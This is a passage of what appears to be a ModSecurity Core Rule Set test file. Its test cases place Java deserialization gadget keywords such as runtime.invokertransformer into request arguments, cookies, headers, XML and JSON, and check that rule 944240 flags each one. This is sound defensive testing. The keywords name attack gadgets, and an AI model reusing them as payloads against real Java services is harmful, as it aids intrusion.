"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.clonetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-8 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.clonetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-9 desc: "Content-Type application/json arg value includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.clonetransformer\"}" output: log_contains: "id \"944240\"" - test_title: 944240-10 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.clonetransformer\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-11 desc: "Argument test includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.forclosure" output: log_contains: "id \"944240\"" - test_title: 944240-12 desc: "Argument name includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.forclosure=test" output: log_contains: "id \"944240\"" - test_title: 944240-13 desc: "Cookie test includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.forclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-14 desc: "Cookie name includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.forclosure=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-15 desc: "Request header test includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.forclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-16 desc: "XML attribute value includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-17 desc: "XML element value includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.forclosure" output: log_contains: "id \"944240\"" - test_title: 944240-18 desc: "Nested XML element value includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.forclosure" output: log_contains: "id \"944240\"" - test_title: 944240-19 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.forclosure" output: log_contains: "id \"944240\"" - test_title: 944240-20 desc: "Content-Type application/json arg value includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.forclosure\"}" output: log_contains: "id \"944240\"" - test_title: 944240-21 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.forclosure\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-22 desc: "Argument test includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.instantiatefactory" output: log_contains: "id \"944240\"" - test_title: 944240-23 desc: "Argument name includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatefactory=test" output: log_contains: "id \"944240\"" - test_title: 944240-24 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.instantiatefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-25 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.instantiatefactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-26 desc: "Request header test includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.instantiatefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-27 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-28 desc: "XML element value includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatefactory" output: log_contains: "id \"944240\"" - test_title: 944240-29 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatefactory" output: log_contains: "id \"944240\"" - test_title: 944240-30 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.instantiatefactory" output: log_contains: "id \"944240\"" - test_title: 944240-31 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.instantiatefactory\"}" output: log_contains: "id \"944240\"" - test_title: 944240-32 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.instantiatefactory\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-33 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.instantiatetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-34 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatetransformer=test" output: log_contains: "id \"944240\"" - test_title: 944240-35 desc: "Cookie test includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.instantiatetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-36 desc: "Cookie name includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.instantiatetransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-37 desc: "Request header test includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.instantiatetransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-38 desc: "XML attribute value includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-39 desc: "XML element value includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-40 desc: "Nested XML element value includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.instantiatetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-41 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.instantiatetransformer" output: log_contains: "id \"944240\"" - test_title: 944240-42 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.instantiatetransformer\"}" output: log_contains: "id \"944240\"" - test_title: 944240-43 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.instantiatetransformer\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-44 desc: "Argument test includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.invokertransformer" output: log_contains: "id \"944240\"" - test_title: 944240-45 desc: "Argument name includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.invokertransformer=test" output: log_contains: "id \"944240\"" - test_title: 944240-46 desc: "Cookie test includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.invokertransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-47 desc: "Cookie name includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.invokertransformer=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-48 desc: "Request header test includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.invokertransformer method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-49 desc: "XML attribute value includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-50 desc: "XML element value includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.invokertransformer" output: log_contains: "id \"944240\"" - test_title: 944240-51 desc: "Nested XML element value includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.invokertransformer" output: log_contains: "id \"944240\"" - test_title: 944240-52 desc: "Content-Type text/plain includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.invokertransformer" output: log_contains: "id \"944240\"" - test_title: 944240-53 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.invokertransformer\"}" output: log_contains: "id \"944240\"" - test_title: 944240-54 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.invokertransformer\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-55 desc: "Argument test includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.prototypeclonefactory" output: log_contains: "id \"944240\"" - test_title: 944240-56 desc: "Argument name includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: 